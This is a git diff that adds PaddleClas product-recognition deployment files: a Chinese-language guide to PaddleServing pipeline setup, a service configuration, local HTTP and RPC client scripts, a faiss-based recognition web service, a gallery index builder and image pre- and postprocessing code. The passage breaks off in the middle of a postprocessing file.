+需要准备PaddleClas的运行环境和PaddleServing的运行环境。 + +- 准备PaddleClas的[运行环境](../../docs/zh_CN/tutorials/install.md), 根据环境下载对应的paddle whl包,推荐安装2.1.0版本 + +- 准备PaddleServing的运行环境,步骤如下 + +1. 安装serving,用于启动服务 + ``` + pip3 install paddle-serving-server==0.6.1 # for CPU + pip3 install paddle-serving-server-gpu==0.6.1 # for GPU + # 其他GPU环境需要确认环境再选择执行如下命令 + pip3 install paddle-serving-server-gpu==0.6.1.post101 # GPU with CUDA10.1 + TensorRT6 + pip3 install paddle-serving-server-gpu==0.6.1.post11 # GPU with CUDA11 + TensorRT7 + ``` + +2. 安装client,用于向服务发送请求 + 在[下载链接](https://github.com/PaddlePaddle/Serving/blob/develop/doc/LATEST_PACKAGES.md)中找到对应python版本的client安装包,这里推荐python3.7版本: + + ``` + wget https://paddle-serving.bj.bcebos.com/test-dev/whl/paddle_serving_client-0.0.0-cp37-none-any.whl + pip3 install paddle_serving_client-0.0.0-cp37-none-any.whl + ``` + +3. 安装serving-app + ``` + pip3 install paddle-serving-app==0.6.1 + ``` + **Note:** 如果要安装最新版本的PaddleServing参考[链接](https://github.com/PaddlePaddle/Serving/blob/develop/doc/LATEST_PACKAGES.md)。 + + +## 模型转换 + +使用PaddleServing做服务化部署时,需要将保存的inference模型转换为serving易于部署的模型。 +以下内容假定当前工作目录为PaddleClas根目录。 + +首先,下载商品识别的inference模型 +``` +cd deploy + +# 下载并解压商品识别模型 +wget -P models/ https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/models/inference/product_ResNet50_vd_aliproduct_v1.0_infer.tar +cd models +tar -xf product_ResNet50_vd_aliproduct_v1.0_infer.tar +``` + +接下来,用安装的paddle_serving_client把下载的inference模型转换成易于server部署的模型格式。 + +``` +# 转换商品识别模型 +python3 -m paddle_serving_client.convert --dirname ./product_ResNet50_vd_aliproduct_v1.0_infer/ \ + --model_filename inference.pdmodel \ + --params_filename inference.pdiparams \ + --serving_server ./product_ResNet50_vd_aliproduct_v1.0_serving/ \ + --serving_client ./product_ResNet50_vd_aliproduct_v1.0_client/ +``` +商品识别推理模型转换完成后,会在当前文件夹多出`product_ResNet50_vd_aliproduct_v1.0_serving` 和`product_ResNet50_vd_aliproduct_v1.0_client`的文件夹,具备如下格式: +``` +|- product_ResNet50_vd_aliproduct_v1.0_serving/ + |- __model__ + |- __params__ + |- serving_server_conf.prototxt + |- serving_server_conf.stream.prototxt + +|- product_ResNet50_vd_aliproduct_v1.0_client + |- serving_client_conf.prototxt + |- serving_client_conf.stream.prototxt + +``` +得到模型文件之后,需要修改serving_server_conf.prototxt中的alias名字: 将`fetch_var`中的`alias_name`改为`features`, +修改后的serving_server_conf.prototxt内容如下: +``` +feed_var { + name: "x" + alias_name: "x" + is_lod_tensor: false + feed_type: 1 + shape: 3 + shape: 224 + shape: 224 +} +fetch_var { + name: "save_infer_model/scale_0.tmp_1" + alias_name: "features" + is_lod_tensor: true + fetch_type: 1 + shape: -1 +} +``` + +接下来,下载并解压已经构建后的商品库index +``` +cd ../ +wget https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/data/recognition_demo_data_v1.1.tar && tar -xf recognition_demo_data_v1.1.tar +``` + + + +## Paddle Serving pipeline部署 + +**注意:** pipeline部署方式不支持windows平台 + +1. 下载PaddleClas代码,若已下载可跳过此步骤 + ``` + git clone https://github.com/PaddlePaddle/PaddleClas + + # 进入到工作目录 + cd PaddleClas/deploy/paddleserving/recognition + ``` + paddleserving目录包含启动pipeline服务和发送预测请求的代码,包括: + ``` + __init__.py + config.yml # 启动服务的配置文件 + pipeline_http_client.py # http方式发送pipeline预测请求的脚本 + pipeline_rpc_client.py # rpc方式发送pipeline预测请求的脚本 + recognition_web_service.py # 启动pipeline服务端的脚本 + ``` + +2. 启动服务可运行如下命令: + ``` + # 启动服务,运行日志保存在log.txt + python3 recognition_web_service.py &>log.txt & + ``` + 成功启动服务后,log.txt中会打印类似如下日志 + ![](../imgs/start_server_recog.png) + +3. 发送服务请求: + ``` + python3 pipeline_http_client.py + ``` + 成功运行后,模型预测的结果会打印在cmd窗口中,结果示例为: + ![](../imgs/results_recog.png) + + 调整 config.yml 中的并发个数可以获得最大的QPS + ``` + op: + #并发数,is_thread_op=True时,为线程并发;否则为进程并发 + concurrency: 8 + ... + ``` + 有需要的话可以同时发送多个服务请求 + + 预测性能数据会被自动写入 `PipelineServingLogs/pipeline.tracer` 文件中。 + + +## FAQ +**Q1**: 发送请求后没有结果返回或者提示输出解码报错 + +**A1**: 启动服务和发送请求时不要设置代理,可以在启动服务前和发送请求前关闭代理,关闭代理的命令是: +``` +unset https_proxy +unset http_proxy +``` diff --git a/Smart_container/PaddleClas/deploy/paddleserving/recognition/__init__.py b/Smart_container/PaddleClas/deploy/paddleserving/recognition/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/Smart_container/PaddleClas/deploy/paddleserving/recognition/config.yml b/Smart_container/PaddleClas/deploy/paddleserving/recognition/config.yml new file mode 100644 index 0000000..f67ee55 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/recognition/config.yml @@ -0,0 +1,43 @@ +#worker_num, 最大并发数。当build_dag_each_worker=True时, 框架会创建worker_num个进程,每个进程内构建grpcSever和DAG +##当build_dag_each_worker=False时,框架会设置主线程grpc线程池的max_workers=worker_num +worker_num: 1 + +#http端口, rpc_port和http_port不允许同时为空。当rpc_port可用且http_port为空时,不自动生成http_port +http_port: 18081 +rpc_port: 9994 + +dag: + #op资源类型, True, 为线程模型;False,为进程模型 + is_thread_op: False +op: + rec: + #并发数,is_thread_op=True时,为线程并发;否则为进程并发 + concurrency: 1 + + #当op配置没有server_endpoints时,从local_service_conf读取本地服务配置 + local_service_conf: + + #uci模型路径 + model_config: ../../models/product_ResNet50_vd_aliproduct_v1.0_serving + + #计算硬件类型: 空缺时由devices决定(CPU/GPU),0=cpu, 1=gpu, 2=tensorRT, 3=arm cpu, 4=kunlun xpu + device_type: 1 + + #计算硬件ID,当devices为""或不写时为CPU预测;当devices为"0", "0,1,2"时为GPU预测,表示使用的GPU卡 + devices: "0" # "0,1" + + #client类型,包括brpc, grpc和local_predictor.local_predictor不启动Serving服务,进程内预测 + client_type: local_predictor + + #Fetch结果列表,以client_config中fetch_var的alias_name为准 + fetch_list: ["features"] + + det: + concurrency: 1 + local_service_conf: + client_type: local_predictor + device_type: 1 + devices: '0' + fetch_list: + - save_infer_model/scale_0.tmp_1 + model_config: ../../models/ppyolov2_r50vd_dcn_mainbody_v1.0_serving/ \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/paddleserving/recognition/daoxiangcunjinzhubing_6.jpg b/Smart_container/PaddleClas/deploy/paddleserving/recognition/daoxiangcunjinzhubing_6.jpg new file mode 100644 index 0000000..fc64a95 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/paddleserving/recognition/daoxiangcunjinzhubing_6.jpg differ diff --git a/Smart_container/PaddleClas/deploy/paddleserving/recognition/label_list.txt b/Smart_container/PaddleClas/deploy/paddleserving/recognition/label_list.txt new file mode 100644 index 0000000..35e26a6 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/recognition/label_list.txt @@ -0,0 +1,2 @@ +foreground +background \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/paddleserving/recognition/pipeline_http_client.py b/Smart_container/PaddleClas/deploy/paddleserving/recognition/pipeline_http_client.py new file mode 100644 index 0000000..aa0cb54 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/recognition/pipeline_http_client.py @@ -0,0 +1,21 @@ +import requests +import json +import base64 +import os + +imgpath = "daoxiangcunjinzhubing_6.jpg" + +def cv2_to_base64(image): + return base64.b64encode(image).decode('utf8') + +if __name__ == "__main__": + url = "http://127.0.0.1:18081/recognition/prediction" + + with open(os.path.join(".", imgpath), 'rb') as file: + image_data1 = file.read() + image = cv2_to_base64(image_data1) + data = {"key": ["image"], "value": [image]} + + for i in range(1): + r = requests.post(url=url, data=json.dumps(data)) + print(r.json()) diff --git a/Smart_container/PaddleClas/deploy/paddleserving/recognition/pipeline_rpc_client.py b/Smart_container/PaddleClas/deploy/paddleserving/recognition/pipeline_rpc_client.py new file mode 100644 index 0000000..8a3257d --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/recognition/pipeline_rpc_client.py @@ -0,0 +1,34 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +try: + from paddle_serving_server_gpu.pipeline import PipelineClient +except ImportError: + from paddle_serving_server.pipeline import PipelineClient +import base64 + +client = PipelineClient() +client.connect(['127.0.0.1:9994']) +imgpath = "daoxiangcunjinzhubing_6.jpg" + +def cv2_to_base64(image): + return base64.b64encode(image).decode('utf8') + +if __name__ == "__main__": + with open(imgpath, 'rb') as file: + image_data = file.read() + image = cv2_to_base64(image_data) + + for i in range(1): + ret = client.predict(feed_dict={"image": image}, fetch=["result"]) + print(ret) diff --git a/Smart_container/PaddleClas/deploy/paddleserving/recognition/recognition_web_service.py b/Smart_container/PaddleClas/deploy/paddleserving/recognition/recognition_web_service.py new file mode 100644 index 0000000..88daf96 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/recognition/recognition_web_service.py @@ -0,0 +1,198 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +from paddle_serving_server.web_service import WebService, Op +import logging +import numpy as np +import sys +import cv2 +from paddle_serving_app.reader import * +import base64 +import os +import faiss +import pickle +import json + +class DetOp(Op): + def init_op(self): + self.img_preprocess = Sequential([ + BGR2RGB(), Div(255.0), + Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225], False), + Resize((640, 640)), Transpose((2, 0, 1)) + ]) + + self.img_postprocess = RCNNPostprocess("label_list.txt", "output") + self.threshold = 0.2 + self.max_det_results = 5 + + def generate_scale(self, im): + """ + Args: + im (np.ndarray): image (np.ndarray) + Returns: + im_scale_x: the resize ratio of X + im_scale_y: the resize ratio of Y + """ + target_size = [640, 640] + origin_shape = im.shape[:2] + resize_h, resize_w = target_size + im_scale_y = resize_h / float(origin_shape[0]) + im_scale_x = resize_w / float(origin_shape[1]) + return im_scale_y, im_scale_x + + def preprocess(self, input_dicts, data_id, log_id): + (_, input_dict), = input_dicts.items() + imgs = [] + raw_imgs = [] + for key in input_dict.keys(): + data = base64.b64decode(input_dict[key].encode('utf8')) + raw_imgs.append(data) + data = np.fromstring(data, np.uint8) + raw_im = cv2.imdecode(data, cv2.IMREAD_COLOR) + + im_scale_y, im_scale_x = self.generate_scale(raw_im) + im = self.img_preprocess(raw_im) + + imgs.append({ + "image": im[np.newaxis, :], + "im_shape": np.array(list(im.shape[1:])).reshape(-1)[np.newaxis,:], + "scale_factor": np.array([im_scale_y, im_scale_x]).astype('float32'), + }) + self.raw_img = raw_imgs + + feed_dict = { + "image": np.concatenate([x["image"] for x in imgs], axis=0), + "im_shape": np.concatenate([x["im_shape"] for x in imgs], axis=0), + "scale_factor": np.concatenate([x["scale_factor"] for x in imgs], axis=0) + } + return feed_dict, False, None, "" + + def postprocess(self, input_dicts, fetch_dict, log_id): + boxes = self.img_postprocess(fetch_dict, visualize=False) + boxes.sort(key = lambda x: x["score"], reverse = True) + boxes = filter(lambda x: x["score"] >= self.threshold, boxes[:self.max_det_results]) + boxes = list(boxes) + for i in range(len(boxes)): + boxes[i]["bbox"][2] += boxes[i]["bbox"][0] - 1 + boxes[i]["bbox"][3] += boxes[i]["bbox"][1] - 1 + result = json.dumps(boxes) + res_dict = {"bbox_result": result, "image": self.raw_img} + return res_dict, None, "" + +class RecOp(Op): + def init_op(self): + self.seq = Sequential([ + BGR2RGB(), Resize((224, 224)), + Div(255), Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225], + False), Transpose((2, 0, 1)) + ]) + + index_dir = "../../recognition_demo_data_v1.1/gallery_product/index" + assert os.path.exists(os.path.join( + index_dir, "vector.index")), "vector.index not found ..." + assert os.path.exists(os.path.join( + index_dir, "id_map.pkl")), "id_map.pkl not found ... " + + self.searcher = faiss.read_index( + os.path.join(index_dir, "vector.index")) + + with open(os.path.join(index_dir, "id_map.pkl"), "rb") as fd: + self.id_map = pickle.load(fd) + + self.rec_nms_thresold = 0.05 + self.rec_score_thres = 0.5 + self.feature_normalize = True + self.return_k = 1 + + def preprocess(self, input_dicts, data_id, log_id): + (_, input_dict), = input_dicts.items() + raw_img = input_dict["image"][0] + data = np.frombuffer(raw_img, np.uint8) + origin_img = cv2.imdecode(data, cv2.IMREAD_COLOR) + dt_boxes = input_dict["bbox_result"] + boxes = json.loads(dt_boxes) + boxes.append({"category_id": 0, + "score": 1.0, + "bbox": [0, 0, origin_img.shape[1], origin_img.shape[0]] + }) + self.det_boxes = boxes + + #construct batch images for rec + imgs = [] + for box in boxes: + box = [int(x) for x in box["bbox"]] + im = origin_img[box[1]: box[3], box[0]: box[2]].copy() + img = self.seq(im) + imgs.append(img[np.newaxis, :].copy()) + + input_imgs = np.concatenate(imgs, axis=0) + return {"x": input_imgs}, False, None, "" + + def nms_to_rec_results(self, results, thresh = 0.1): + filtered_results = [] + x1 = np.array([r["bbox"][0] for r in results]).astype("float32") + y1 = np.array([r["bbox"][1] for r in results]).astype("float32") + x2 = np.array([r["bbox"][2] for r in results]).astype("float32") + y2 = np.array([r["bbox"][3] for r in results]).astype("float32") + scores = np.array([r["rec_scores"] for r in results]) + + areas = (x2 - x1 + 1) * (y2 - y1 + 1) + order = scores.argsort()[::-1] + while order.size > 0: + i = order[0] + xx1 = np.maximum(x1[i], x1[order[1:]]) + yy1 = np.maximum(y1[i], y1[order[1:]]) + xx2 = np.minimum(x2[i], x2[order[1:]]) + yy2 = np.minimum(y2[i], y2[order[1:]]) + + w = np.maximum(0.0, xx2 - xx1 + 1) + h = np.maximum(0.0, yy2 - yy1 + 1) + inter = w * h + ovr = inter / (areas[i] + areas[order[1:]] - inter) + inds = np.where(ovr <= thresh)[0] + order = order[inds + 1] + filtered_results.append(results[i]) + return filtered_results + + def postprocess(self, input_dicts, fetch_dict, log_id): + batch_features = fetch_dict["features"] + + if self.feature_normalize: + feas_norm = np.sqrt( + np.sum(np.square(batch_features), axis=1, keepdims=True)) + batch_features = np.divide(batch_features, feas_norm) + + scores, docs = self.searcher.search(batch_features, self.return_k) + + results = [] + for i in range(scores.shape[0]): + pred = {} + if scores[i][0] >= self.rec_score_thres: + pred["bbox"] = [int(x) for x in self.det_boxes[i]["bbox"]] + pred["rec_docs"] = self.id_map[docs[i][0]].split()[1] + pred["rec_scores"] = scores[i][0] + results.append(pred) + + #do nms + results = self.nms_to_rec_results(results, self.rec_nms_thresold) + return {"result": str(results)}, None, "" + +class RecognitionService(WebService): + def get_pipeline_response(self, read_op): + det_op = DetOp(name="det", input_ops=[read_op]) + rec_op = RecOp(name="rec", input_ops=[det_op]) + return rec_op + +product_recog_service = RecognitionService(name="recognition") +product_recog_service.prepare_pipeline_config("config.yml") +product_recog_service.run_service() diff --git a/Smart_container/PaddleClas/deploy/python/__init__.py b/Smart_container/PaddleClas/deploy/python/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/Smart_container/PaddleClas/deploy/python/build_gallery.py b/Smart_container/PaddleClas/deploy/python/build_gallery.py new file mode 100644 index 0000000..7b69a04 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/python/build_gallery.py @@ -0,0 +1,214 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import os +import sys + +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../'))) + +import cv2 +import faiss +import numpy as np +from tqdm import tqdm +import pickle + +from python.predict_rec import RecPredictor + +from utils import logger +from utils import config + + +def split_datafile(data_file, image_root, delimiter="\t"): + ''' + data_file: image path and info, which can be splitted by spacer + image_root: image path root + delimiter: delimiter + ''' + gallery_images = [] + gallery_docs = [] + with open(data_file, 'r', encoding='utf-8') as f: + lines = f.readlines() + for _, ori_line in enumerate(lines): + line = ori_line.strip().split(delimiter) + text_num = len(line) + assert text_num >= 2, f"line({ori_line}) must be splitted into at least 2 parts, but got {text_num}" + image_file = os.path.join(image_root, line[0]) + + gallery_images.append(image_file) + gallery_docs.append(ori_line.strip()) + + return gallery_images, gallery_docs + + +class GalleryBuilder(object): + def __init__(self, config): + + self.config = config + self.rec_predictor = RecPredictor(config) + assert 'IndexProcess' in config.keys(), "Index config not found ... " + self.build(config['IndexProcess']) + + def build(self, config): + ''' + build index from scratch + ''' + operation_method = config.get("index_operation", "new").lower() + + gallery_images, gallery_docs = split_datafile( + config['data_file'], config['image_root'], config['delimiter']) + + # when remove data in index, do not need extract fatures + if operation_method != "remove": + gallery_features = self._extract_features(gallery_images, config) + assert operation_method in [ + "new", "remove", "append" + ], "Only append, remove and new operation are supported" + + # vector.index: faiss index file + # id_map.pkl: use this file to map id to image_doc + if operation_method in ["remove", "append"]: + # if remove or append, vector.index and id_map.pkl must exist + assert os.path.join( + config["index_dir"], "vector.index" + ), "The vector.index dose not exist in {} when 'index_operation' is not None".format( + config["index_dir"]) + assert os.path.join( + config["index_dir"], "id_map.pkl" + ), "The id_map.pkl dose not exist in {} when 'index_operation' is not None".format( + config["index_dir"]) + index = faiss.read_index( + os.path.join(config["index_dir"], "vector.index")) + with open(os.path.join(config["index_dir"], "id_map.pkl"), + 'rb') as fd: + ids = pickle.load(fd) + assert index.ntotal == len(ids.keys( + )), "data number in index is not equal in in id_map" + else: + if not os.path.exists(config["index_dir"]): + os.makedirs(config["index_dir"], exist_ok=True) + index_method = config.get("index_method", "HNSW32") + + # if IVF method, cal ivf number automaticlly + if index_method == "IVF": + index_method = index_method + str( + min(int(len(gallery_images) // 8), 65536)) + ",Flat" + + # for binary index, add B at head of index_method + if config["dist_type"] == "hamming": + index_method = "B" + index_method + + #dist_type + dist_type = faiss.METRIC_INNER_PRODUCT if config[ + "dist_type"] == "IP" else faiss.METRIC_L2 + + #build index + if config["dist_type"] == "hamming": + index = faiss.index_binary_factory(config["embedding_size"], + index_method) + else: + index = faiss.index_factory(config["embedding_size"], + index_method, dist_type) + index = faiss.IndexIDMap2(index) + ids = {} + + if config["index_method"] == "HNSW32": + logger.warning( + "The HNSW32 method dose not support 'remove' operation") + + if operation_method != "remove": + # calculate id for new data + start_id = max(ids.keys()) + 1 if ids else 0 + ids_now = ( + np.arange(0, len(gallery_images)) + start_id).astype(np.int64) + + # only train when new index file + if operation_method == "new": + if config["dist_type"] == "hamming": + index.add(gallery_features) + else: + index.train(gallery_features) + + if not config["dist_type"] == "hamming": + index.add_with_ids(gallery_features, ids_now) + + for i, d in zip(list(ids_now), gallery_docs): + ids[i] = d + else: + if config["index_method"] == "HNSW32": + raise RuntimeError( + "The index_method: HNSW32 dose not support 'remove' operation" + ) + # remove ids in id_map, remove index data in faiss index + remove_ids = list( + filter(lambda k: ids.get(k) in gallery_docs, ids.keys())) + remove_ids = np.asarray(remove_ids) + index.remove_ids(remove_ids) + for k in remove_ids: + del ids[k] + + # store faiss index file and id_map file + if config["dist_type"] == "hamming": + faiss.write_index_binary( + index, os.path.join(config["index_dir"], "vector.index")) + else: + faiss.write_index( + index, os.path.join(config["index_dir"], "vector.index")) + + with open(os.path.join(config["index_dir"], "id_map.pkl"), 'wb') as fd: + pickle.dump(ids, fd) + + def _extract_features(self, gallery_images, config): + # extract gallery features + if config["dist_type"] == "hamming": + gallery_features = np.zeros( + [len(gallery_images), config['embedding_size'] // 8], + dtype=np.uint8) + else: + gallery_features = np.zeros( + [len(gallery_images), config['embedding_size']], + dtype=np.float32) + + #construct batch imgs and do inference + batch_size = config.get("batch_size", 32) + batch_img = [] + for i, image_file in enumerate(tqdm(gallery_images)): + img = cv2.imread(image_file) + if img is None: + logger.error("img empty, please check {}".format(image_file)) + exit() + img = img[:, :, ::-1] + batch_img.append(img) + + if (i + 1) % batch_size == 0: + rec_feat = self.rec_predictor.predict(batch_img) + gallery_features[i - batch_size + 1:i + 1, :] = rec_feat + batch_img = [] + + if len(batch_img) > 0: + rec_feat = self.rec_predictor.predict(batch_img) + gallery_features[-len(batch_img):, :] = rec_feat + batch_img = [] + + return gallery_features + + +def main(config): + GalleryBuilder(config) + return + + +if __name__ == "__main__": + args = config.parse_args() + config = config.get_config(args.config, overrides=args.override, show=True) + main(config) diff --git a/Smart_container/PaddleClas/deploy/python/det_preprocess.py b/Smart_container/PaddleClas/deploy/python/det_preprocess.py new file mode 100644 index 0000000..5f5760e --- /dev/null +++ b/Smart_container/PaddleClas/deploy/python/det_preprocess.py @@ -0,0 +1,205 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import cv2 +import numpy as np + + +def decode_image(im_file, im_info): + """read rgb image + Args: + im_file (str|np.ndarray): input can be image path or np.ndarray + im_info (dict): info of image + Returns: + im (np.ndarray): processed image (np.ndarray) + im_info (dict): info of processed image + """ + if isinstance(im_file, str): + with open(im_file, 'rb') as f: + im_read = f.read() + data = np.frombuffer(im_read, dtype='uint8') + im = cv2.imdecode(data, 1) # BGR mode, but need RGB mode + im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB) + else: + im = im_file + im_info['im_shape'] = np.array(im.shape[:2], dtype=np.float32) + im_info['scale_factor'] = np.array([1., 1.], dtype=np.float32) + return im, im_info + + +class DetResize(object): + """resize image by target_size and max_size + Args: + target_size (int): the target size of image + keep_ratio (bool): whether keep_ratio or not, default true + interp (int): method of resize + """ + + def __init__( + self, + target_size, + keep_ratio=True, + interp=cv2.INTER_LINEAR, ): + if isinstance(target_size, int): + target_size = [target_size, target_size] + self.target_size = target_size + self.keep_ratio = keep_ratio + self.interp = interp + + def __call__(self, im, im_info): + """ + Args: + im (np.ndarray): image (np.ndarray) + im_info (dict): info of image + Returns: + im (np.ndarray): processed image (np.ndarray) + im_info (dict): info of processed image + """ + assert len(self.target_size) == 2 + assert self.target_size[0] > 0 and self.target_size[1] > 0 + im_channel = im.shape[2] + im_scale_y, im_scale_x = self.generate_scale(im) + # set image_shape + im_info['input_shape'][1] = int(im_scale_y * im.shape[0]) + im_info['input_shape'][2] = int(im_scale_x * im.shape[1]) + im = cv2.resize( + im, + None, + None, + fx=im_scale_x, + fy=im_scale_y, + interpolation=self.interp) + im_info['im_shape'] = np.array(im.shape[:2]).astype('float32') + im_info['scale_factor'] = np.array( + [im_scale_y, im_scale_x]).astype('float32') + return im, im_info + + def generate_scale(self, im): + """ + Args: + im (np.ndarray): image (np.ndarray) + Returns: + im_scale_x: the resize ratio of X + im_scale_y: the resize ratio of Y + """ + origin_shape = im.shape[:2] + im_c = im.shape[2] + if self.keep_ratio: + im_size_min = np.min(origin_shape) + im_size_max = np.max(origin_shape) + target_size_min = np.min(self.target_size) + target_size_max = np.max(self.target_size) + im_scale = float(target_size_min) / float(im_size_min) + if np.round(im_scale * im_size_max) > target_size_max: + im_scale = float(target_size_max) / float(im_size_max) + im_scale_x = im_scale + im_scale_y = im_scale + else: + resize_h, resize_w = self.target_size + im_scale_y = resize_h / float(origin_shape[0]) + im_scale_x = resize_w / float(origin_shape[1]) + return im_scale_y, im_scale_x + + +class DetNormalizeImage(object): + """normalize image + Args: + mean (list): im - mean + std (list): im / std + is_scale (bool): whether need im / 255 + is_channel_first (bool): if True: image shape is CHW, else: HWC + """ + + def __init__(self, mean, std, is_scale=True): + self.mean = mean + self.std = std + self.is_scale = is_scale + + def __call__(self, im, im_info): + """ + Args: + im (np.ndarray): image (np.ndarray) + im_info (dict): info of image + Returns: + im (np.ndarray): processed image (np.ndarray) + im_info (dict): info of processed image + """ + im = im.astype(np.float32, copy=False) + mean = np.array(self.mean)[np.newaxis, np.newaxis, :] + std = np.array(self.std)[np.newaxis, np.newaxis, :] + + if self.is_scale: + im = im / 255.0 + + im -= mean + im /= std + return im, im_info + + +class DetPermute(object): + """permute image + Args: + to_bgr (bool): whether convert RGB to BGR + channel_first (bool): whether convert HWC to CHW + """ + + def __init__(self, ): + super().__init__() + + def __call__(self, im, im_info): + """ + Args: + im (np.ndarray): image (np.ndarray) + im_info (dict): info of image + Returns: + im (np.ndarray): processed image (np.ndarray) + im_info (dict): info of processed image + """ + im = im.transpose((2, 0, 1)).copy() + return im, im_info + + +class DetPadStride(object): + """ padding image for model with FPN , instead PadBatch(pad_to_stride, pad_gt) in original config + Args: + stride (bool): model with FPN need image shape % stride == 0 + """ + + def __init__(self, stride=0): + self.coarsest_stride = stride + + def __call__(self, im, im_info): + """ + Args: + im (np.ndarray): image (np.ndarray) + im_info (dict): info of image + Returns: + im (np.ndarray): processed image (np.ndarray) + im_info (dict): info of processed image + """ + coarsest_stride = self.coarsest_stride + if coarsest_stride <= 0: + return im, im_info + im_c, im_h, im_w = im.shape + pad_h = int(np.ceil(float(im_h) / coarsest_stride) * coarsest_stride) + pad_w = int(np.ceil(float(im_w) / coarsest_stride) * coarsest_stride) + padding_im = np.zeros((im_c, pad_h, pad_w), dtype=np.float32) + padding_im[:, :im_h, :im_w] = im + return padding_im, im_info + + +def det_preprocess(im, im_info, preprocess_ops): + for operator in preprocess_ops: + im, im_info = operator(im, im_info) + return im, im_info diff --git a/Smart_container/PaddleClas/deploy/python/postprocess.py b/Smart_container/PaddleClas/deploy/python/postprocess.py new file mode 100644 index 0000000..d26cbaa --- /dev/null +++ b/Smart_container/PaddleClas/deploy/python/postprocess.py @@ -0,0 +1,161 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os +import copy +import shutil +from functools import partial +import importlib +import numpy as np +import paddle +import paddle.nn.functional as F + + +def build_postprocess(config): + if config is None: + return None + + mod = importlib.import_module(__name__) + config = copy.deepcopy(config) + + main_indicator = config.pop( + "main_indicator") if "main_indicator" in config else None + main_indicator = main_indicator if main_indicator else "" + + func_list = [] + for func in config: + func_list.append(getattr(mod, func)(**config[func])) + return PostProcesser(func_list, main_indicator) + + +class PostProcesser(object): + def __init__(self, func_list, main_indicator="Topk"): + self.func_list = func_list + self.main_indicator = main_indicator + + def __call__(self, x, image_file=None): + rtn = None + for func in self.func_list: + tmp = func(x, image_file) + if type(func).__name__ in self.main_indicator: + rtn = tmp + return rtn + + +class Topk(object): + def __init__(self, topk=1, class_id_map_file=None): + assert isinstance(topk, (int, )) + self.class_id_map = self.parse_class_id_map(class_id_map_file) + self.topk = topk + + def parse_class_id_map(self, class_id_map_file): + if class_id_map_file is None: + return None + + if not os.path.exists(class_id_map_file): + print( + "Warning: If want to use your own label_dict, please input legal path!\nOtherwise label_names will be empty!" + ) + return None + + try: + class_id_map = {} + with open(class_id_map_file, "r") as fin: + lines = fin.readlines() + for line in lines: + partition = line.split("\n")[0].partition(" ") + class_id_map[int(partition[0])] = str(partition[-1]) + except Exception as ex: + print(ex) + class_id_map = None + return class_id_map + + def __call__(self, x, file_names=None, multilabel=False): + if file_names is not None: + assert x.shape[0] == len(file_names) + y = [] + for idx, probs in enumerate(x): + index = probs.argsort(axis=0)[-self.topk:][::-1].astype( + "int32") if not multilabel else np.where( + probs >= 0.5)[0].astype("int32") + clas_id_list = [] + score_list = [] + label_name_list = [] + for i in index: + clas_id_list.append(i.item()) + score_list.append(probs[i].item()) + if self.class_id_map is not None: + label_name_list.append(self.class_id_map[i.item()]) + result = { + "class_ids": clas_id_list, + "scores": np.around( + score_list, decimals=5).tolist(), + } + if file_names is not None: + result["file_name"] = file_names[idx] + if label_name_list is not None: + result["label_names"] = label_name_list + y.append(result) + return y + + +class MultiLabelTopk(Topk): + def __init__(self, topk=1, class_id_map_file=None): + super().__init__() + + def __call__(self, x, file_names=None): + return super().__call__(x, file_names, multilabel=True) + + +class SavePreLabel(object): + def __init__(self, save_dir): + if save_dir is None: + raise Exception( + "Please specify 